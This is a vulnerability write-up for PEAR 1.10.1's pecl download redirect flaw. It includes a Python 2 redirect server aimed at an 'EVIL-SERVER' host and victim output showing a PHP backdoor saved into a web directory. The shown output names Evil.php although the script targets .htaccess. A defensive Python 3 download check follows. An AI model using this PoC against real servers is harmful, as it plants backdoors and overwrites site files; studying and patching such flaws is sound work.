In version 1.10.1 of the PEAR Base System installer, the file type and file name are not verified after a redirect. This allows a remote HTTP server to overwrite files on the victim server, such as .htaccess, via a specially crafted response. The vulnerability is triggered when the victim runs pecl download.
PEAR does not rename the downloaded file when its name duplicates that of an existing file. An attacker can therefore overwrite an existing file or deliver a backdoor, provided the pecl request is made from within a web directory.
Moreover, pecl does not delete a file obtained this way, which gives the attacker time to brute-force the backdoor file before anyone notices it.
PoC video (original version): https://vimeo.com/201341280
Personal recording (the clarity is a bit poor): https://pan.baidu.com/s/1dFaHTxZ
This PoC has three key steps: first, the victim issues a pecl download request; next, the attacker's server receives the file download request; finally, the victim ends up fetching the attacker's PHP backdoor.
1) The victim server attempts to download a legitimate .tgz file.
pecl download http://VULN-SERVER:8080/Test.tgz
2) The attacker's server receives the Test.tgz request and replies.
3) pecl unintentionally downloads a malicious PHP backdoor.
On the attacker's server, run:
python -m SimpleHTTPServer 8888
# Python 2 script: answers every request on PORT with a 302 redirect to TARGET+FILE
import socket

HOST = 'localhost'
PORT = 8080
TARGET = 'http://EVIL-SERVER:8888/'
FILE = '.htaccess'

s = socket.socket()
s.bind((HOST, PORT))
s.listen(10)
print 'Waiting for PECL connections...'
while True:
    conn, addr = s.accept()
    junk = conn.recv(512)  # read and discard the incoming request
    conn.send('HTTP/1.1 302 Found\r\n')
    conn.send('Location: ' + TARGET + FILE + '\r\n')
    conn.close()
s.close()
When the victim server downloads the file:
C:\xampp\htdocs\webapp>pecl download http://VULN-SERVER:8080/Test.tgz
downloading Evil.php ...
Starting to download Evil.php (4,665 bytes)
..... done: 4,665 bytes
Incidentally, the downloaded backdoor is left in the current directory:
File C:\xampp\htdocs\webapp\Evil.php downloaded
Personal summary: the conditions for exploitation are demanding. The victim has to actively run pecl inside a web directory, and the target URL has to point to the attacker's server. However, if the vulnerability is used in phishing on social networking sites, the danger is still great.
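
The checks the installer is described as missing (file name and type after a redirect, and refusing to overwrite an existing file) look like this on the download side. This is an added Python 3 example, not code from the original page or from PEAR; `naive_target`, `safe_save`, the allowed suffixes, the gzip check and the sample bodies are assumptions constructed for illustration, using the URLs from the PoC above.

```python
import os
import posixpath
import tempfile
from pathlib import Path
from urllib.parse import unquote, urlsplit

ALLOWED_SUFFIXES = (".tgz", ".tar.gz")  # assumption: gzip package archives only
GZIP_MAGIC = b"\x1f\x8b"

def url_basename(url):
    """Last path segment of a URL, percent-decoded."""
    return posixpath.basename(unquote(urlsplit(url).path))

def naive_target(dest_dir, final_url):
    """Flaw described above: the saved name comes from the post-redirect URL."""
    return os.path.join(dest_dir, url_basename(final_url))

def safe_save(dest_dir, requested_url, final_url, body):
    """Save under the name the user requested, never the redirect's name."""
    name = url_basename(requested_url)
    if name.startswith(".") or "\\" in name or not name.endswith(ALLOWED_SUFFIXES):
        raise ValueError("requested name is not a package archive: %r" % name)
    if not url_basename(final_url).endswith(ALLOWED_SUFFIXES):
        raise ValueError("redirect changed the file type: %r" % final_url)
    if not body.startswith(GZIP_MAGIC):
        raise ValueError("response body is not gzip data")
    path = os.path.join(dest_dir, name)
    # O_EXCL makes the create fail rather than overwrite an existing file.
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "wb") as fh:
        fh.write(body)
    return path

def demo():
    """Replay the page's redirect against a temporary directory (constructed data)."""
    requested = "http://VULN-SERVER:8080/Test.tgz"
    redirected = "http://EVIL-SERVER:8888/.htaccess"
    out = {"redirect_blocked": False}
    with tempfile.TemporaryDirectory() as webroot:
        existing = Path(webroot, ".htaccess")
        existing.write_text("Require all denied\n")
        out["naive_overwrites"] = naive_target(webroot, redirected) == str(existing)
        try:
            safe_save(webroot, requested, redirected, b"<?php /* constructed */ ?>")
        except ValueError:
            out["redirect_blocked"] = True
        out["htaccess_intact"] = existing.read_text() == "Require all denied\n"
        saved = safe_save(webroot, requested, requested, GZIP_MAGIC + b"constructed")
        out["saved_as"] = os.path.basename(saved)
    return out
```

Calling `demo()` shows the naive name derivation landing on the existing .htaccess, while `safe_save` rejects the redirected response and stores a valid archive only as Test.tgz.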